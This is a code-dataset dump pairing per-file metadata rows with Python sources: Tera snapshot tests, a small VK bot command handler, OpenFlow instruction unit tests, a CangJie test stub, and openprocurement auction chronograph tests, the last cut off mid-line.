| 0.233766
| 0.149254
| 0.232172
| 0.281924
| 0.759536
| 0.759536
| 0.759536
| 0.759536
| 0.666667
| 0.666667
| 0
| 0.154555
| 0.187188
| 1,202
| 22
| 97
| 54.636364
| 0.462641
| 0
| 0
| 0
| 0
| 0
| 0.325291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40ce0430dab24f60ff496f813777045b3352747a
| 10,452
|
py
|
Python
|
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | 4
|
2015-11-05T07:39:09.000Z
|
2021-11-17T10:45:46.000Z
|
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | null | null | null |
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | 3
|
2018-10-18T03:31:26.000Z
|
2019-11-15T04:19:08.000Z
|
'''
Copyright (c) 2015, Baidu.com, Inc. All Rights Reserved
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
import nose
import time
import unittest
import common
from conf import const
def setup():
pass
def teardown():
pass
class Snapshot(unittest.TestCase):
def setUp(self):
out = common.runcmd_output("cd %s; ./teracli showts|grep kReady" % (const.teracli_dir), ignore_status=True)
#assert( len(out.split('\n')) == len(const.tabletnode_list) )
common.check_core()
common.cleanup()
#common.createbyfile('testcase/data/table_schema')
def tearDown(self):
pass
'''
table write w/snapshot
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_snapshot(self):
common.create_singleversion_table()
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
'''
table write deletion w/snapshot
1. write data set 1
2. create snapshot
3. delete data set 1
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_del_snapshot(self):
common.create_singleversion_table()
table_name = 'test'
dump_file = 'dump.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file, scan_file1, need_sort=True))
nose.tools.assert_true(common.file_is_empty(scan_file2))
'''
table write w/version w/snapshot
1. write data set 1, 2
2. create snapshot
3. write data set 3, 4
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_multiversion_snapshot(self):
common.create_multiversion_table()
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
'''
kv cluster relaunch
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
5. kill & launch cluster
6. repeat 4
:return: None
'''
def kv_snapshot_relaunch(self):
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
common.cluster_op('kill')
common.cluster_op('launch')
time.sleep(2)
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
'''
kv cluster relaunch
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
5. kill & launch cluster
6. repeat 4
:return: None
'''
def test_kv_snapshot_relaunch(self):
common.create_kv_table()
self.kv_snapshot_relaunch()
'''
table cluster relaunch
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
5. kill & launch cluster
6. repeat 4
:return: None
'''
def table_snapshot_relaunch(self):
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
common.cluster_op('kill')
common.cluster_op('launch')
time.sleep(2)
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
'''
table cluster relaunch
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
5. kill & launch cluster
6. repeat 4
:return: None
'''
def test_table_snapshot_relaunch(self):
common.create_singleversion_table()
self.table_snapshot_relaunch()
'''
kv snapshot w/multi tablets
1. test_kv_snapshot_relaunch()
:return:
'''
def test_kv_snapshot_multitablets(self):
common.createbyfile(schema=const.data_path + 'kv.schema', deli=const.data_path + 'deli.10')
self.kv_snapshot_relaunch()
'''
table snapshot w/multi tablets
1. test_tablev_snapshot_relaunch()
:return:
'''
def test_table_snapshot_multitablets(self):
common.createbyfile(schema=const.data_path + 'table.schema', deli=const.data_path + 'deli.10')
self.table_snapshot_relaunch()
| 44.288136
| 117
| 0.647723
| 1,444
| 10,452
| 4.435596
| 0.099723
| 0.094145
| 0.056831
| 0.073068
| 0.892116
| 0.862451
| 0.852771
| 0.8484
| 0.834348
| 0.815301
| 0
| 0.042475
| 0.240911
| 10,452
| 235
| 118
| 44.476596
| 0.76481
| 0.025163
| 0
| 0.726563
| 0
| 0
| 0.05726
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.101563
| false
| 0.023438
| 0.039063
| 0
| 0.148438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc0d8b8c896e4c223d3af9c457714c28c3406540
| 667
|
py
|
Python
|
commands.py
|
MaskedTrench/bot
|
8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
commands.py
|
MaskedTrench/bot
|
8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
commands.py
|
MaskedTrench/bot
|
8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
class vk:
def PersonalCommands(event):
text = event.text.split(" ")
print(text, event.text)
if '/команды' == text[0]: return "Text goes here"
elif '/регистрация' == text[0]: return "Link to forms"
elif '/статьи' == text[0]: return "FOR HOUNOR AND BLOOD!"
else: return "None"
def PublicCommands(event):
text = event.text.split(" ")
print(text, event.text)
if '/команды' == text[0]: return "Text goes here"
elif '/регистрация' == text[0]: return "Link to forms"
elif '/статьи' == text[0]: return "FOR HOUNOR AND BLOOD!"
else: return "None"
| 39.235294
| 70
| 0.550225
| 80
| 667
| 4.5875
| 0.3375
| 0.147139
| 0.179837
| 0.098093
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0
| 0.012931
| 0.304348
| 667
| 17
| 71
| 39.235294
| 0.778017
| 0
| 0
| 0.8
| 0
| 0
| 0.23988
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0
| 0
| 0.2
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
904d793d2ecc800237716d2d931d8b2150a1c56f
| 1,842
|
py
|
Python
|
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
import unittest
from pyof.v0x02.common import flow_instruction
class TestOFPInstructionGoToTable(unittest.TestCase):
def test_get_size(self):
message = flow_instruction.OFPInstructionGoToTable(
type=flow_instruction.OFPInstructionsType.OFPIT_GOTO_TABLE,
len=8, table_id=1, pad=[0, 0, 0])
self.assertEqual(message.get_size(), 8)
def test_pack(self):
message = flow_instruction.OFPInstructionGoToTable(
type=flow_instruction.OFPInstructionsType.OFPIT_GOTO_TABLE,
len=8, table_id=1, pad=[0, 0, 0])
message.pack()
def test_unpack(self):
pass
class TestOFPInstructionWriteMetadata(unittest.TestCase):
def test_get_size(self):
message = flow_instruction.OFPInstructionWriteMetadata(
type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_METADATA,
len=24, pad=[0, 0, 0, 0], metadata=1, metadata_mask=1)
self.assertEqual(message.get_size(), 24)
def test_pack(self):
message = flow_instruction.OFPInstructionWriteMetadata(
type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_METADATA,
len=24, pad=[0, 0, 0, 0], metadata=1, metadata_mask=1)
message.pack()
def test_unpack(self):
pass
class TestOFPInstructionActions(unittest.TestCase):
def test_get_size(self):
message = flow_instruction.OFPInstructionActions(
type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_ACTIONS,
len=8)
self.assertEqual(message.get_size(), 8)
def test_pack(self):
message = flow_instruction.OFPInstructionActions(
type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_ACTIONS,
len=8)
message.pack()
def test_unpack(self):
pass
| 33.490909
| 79
| 0.674267
| 199
| 1,842
| 6.020101
| 0.211055
| 0.162771
| 0.075125
| 0.130217
| 0.8798
| 0.855593
| 0.855593
| 0.8197
| 0.75793
| 0.75793
| 0
| 0.024911
| 0.237242
| 1,842
| 54
| 80
| 34.111111
| 0.827758
| 0
| 0
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 1
| 0.219512
| false
| 0.073171
| 0.04878
| 0
| 0.341463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
907ce10da11ce27e1fd621928884ac38e78b6a40
| 140
|
py
|
Python
|
tests/test_utils/test_testing.py
|
bigdata-ustc/CangJie
|
a3264082fa0432d257b5c4722b14c55f9092a411
|
[
"MIT"
] | 2
|
2020-03-04T02:27:29.000Z
|
2020-05-22T04:07:24.000Z
|
tests/test_utils/test_testing.py
|
tswsxk/CangJie
|
50c5183eae1d4f10c4cf364262437afcf54427fa
|
[
"MIT"
] | null | null | null |
tests/test_utils/test_testing.py
|
tswsxk/CangJie
|
50c5183eae1d4f10c4cf364262437afcf54427fa
|
[
"MIT"
] | 1
|
2020-01-07T08:34:59.000Z
|
2020-01-07T08:34:59.000Z
|
# coding: utf-8
# 2020/1/3 @ tongshiwei
from CangJie.utils.testing import pseudo_sentence
def test_testing():
pseudo_sentence(5, 20)
| 15.555556
| 49
| 0.735714
| 21
| 140
| 4.761905
| 0.857143
| 0.28
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 0.157143
| 140
| 8
| 50
| 17.5
| 0.762712
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90c98a3cd381e8c2019c749759c845e2980ff93a
| 49,208
|
py
|
Python
|
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime, timedelta
from openprocurement.api.models import get_now
from openprocurement.auctions.insider.tests.base import BaseAuctionWebTest, test_lots, test_bids, test_financial_auction_data, test_financial_organization, test_financial_bids, test_organization
class AuctionSwitchQualificationResourceTest(BaseAuctionWebTest):
initial_bids = test_bids[:1]
def test_switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
self.assertNotIn("awards", response.json['data'])
class AuctionSwitchAuctionResourceTest(BaseAuctionWebTest):
initial_bids = test_bids
def test_switch_to_auction(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class AuctionSwitchUnsuccessfulResourceTest(BaseAuctionWebTest):
def test_switch_to_unsuccessful(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
if self.initial_lots:
self.assertEqual(set([i['status'] for i in response.json['data']["lots"]]), set(["unsuccessful"]))
@unittest.skip("option not available")
class AuctionLotSwitchQualificationResourceTest(AuctionSwitchQualificationResourceTest):
initial_lots = test_lots
@unittest.skip("option not available")
class AuctionLotSwitchAuctionResourceTest(AuctionSwitchAuctionResourceTest):
initial_lots = test_lots
@unittest.skip("option not available")
class AuctionLotSwitchUnsuccessfulResourceTest(AuctionSwitchUnsuccessfulResourceTest):
initial_lots = test_lots
class AuctionAuctionPeriodResourceTest(BaseAuctionWebTest):
initial_bids = test_bids
def test_set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], 'active.tendering')
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertIn('auctionPeriod', item)
self.assertIn('shouldStartAfter', item['auctionPeriod'])
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('T00:00:00+', item['auctionPeriod']['shouldStartAfter'])
self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(item['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": None}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertNotIn('startDate', item['auctionPeriod'])
def test_reset_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], 'active.tendering')
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertIn('auctionPeriod', item)
self.assertIn('shouldStartAfter', item['auctionPeriod'])
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.set_status('active.auction', {'status': 'active.tendering'})
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
now = get_now().isoformat()
auction = self.db.get(self.auction_id)
if self.initial_lots:
auction['lots'][0]['auctionPeriod']['startDate'] = now
else:
auction['auctionPeriod']['startDate'] = now
self.db.save(auction)
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertGreater(response.json['data']['next_check'], item['auctionPeriod']['startDate'])
self.assertEqual(response.json['data']['next_check'], self.db.get(self.auction_id)['next_check'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertNotIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertGreater(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
auction = self.db.get(self.auction_id)
self.assertGreater(auction['next_check'], response.json['data']['tenderPeriod']['endDate'])
auction['tenderPeriod']['endDate'] = auction['tenderPeriod']['startDate']
if self.initial_lots:
auction['lots'][0]['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
else:
auction['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
self.db.save(auction)
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertNotIn('next_check', response.json['data'])
self.assertNotIn('next_check', self.db.get(self.auction_id))
shouldStartAfter = item['auctionPeriod']['shouldStartAfter']
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertEqual(item['auctionPeriod']['shouldStartAfter'], shouldStartAfter)
self.assertNotIn('next_check', response.json['data'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
class AuctionAwardSwitchResourceTest(BaseAuctionWebTest):
initial_status = 'active.auction'
initial_bids = test_bids
def setUp(self):
super(AuctionAwardSwitchResourceTest, self).setUp()
authorization = self.app.authorization
self.app.authorization = ('Basic', ('auction', ''))
now = get_now()
auction_result = {
'bids': [
{
"id": b['id'],
"date": (now - timedelta(seconds=i)).isoformat(),
"value": b['value']
}
for i, b in enumerate(self.initial_bids)
]
}
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertEqual('active.qualification', auction["status"])
self.award = self.first_award = auction['awards'][0]
self.second_award = auction['awards'][1]
self.award_id = self.first_award_id = self.first_award['id']
self.second_award_id = self.second_award['id']
self.app.authorization = authorization
def test_switch_verification_to_unsuccessful(self):
auction = self.db.get(self.auction_id)
auction['awards'][0]['verificationPeriod']['endDate'] = auction['awards'][0]['verificationPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
def test_switch_payment_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
auction = self.db.get(self.auction_id)
auction['awards'][0]['paymentPeriod']['endDate'] = auction['awards'][0]['paymentPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
def test_switch_active_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
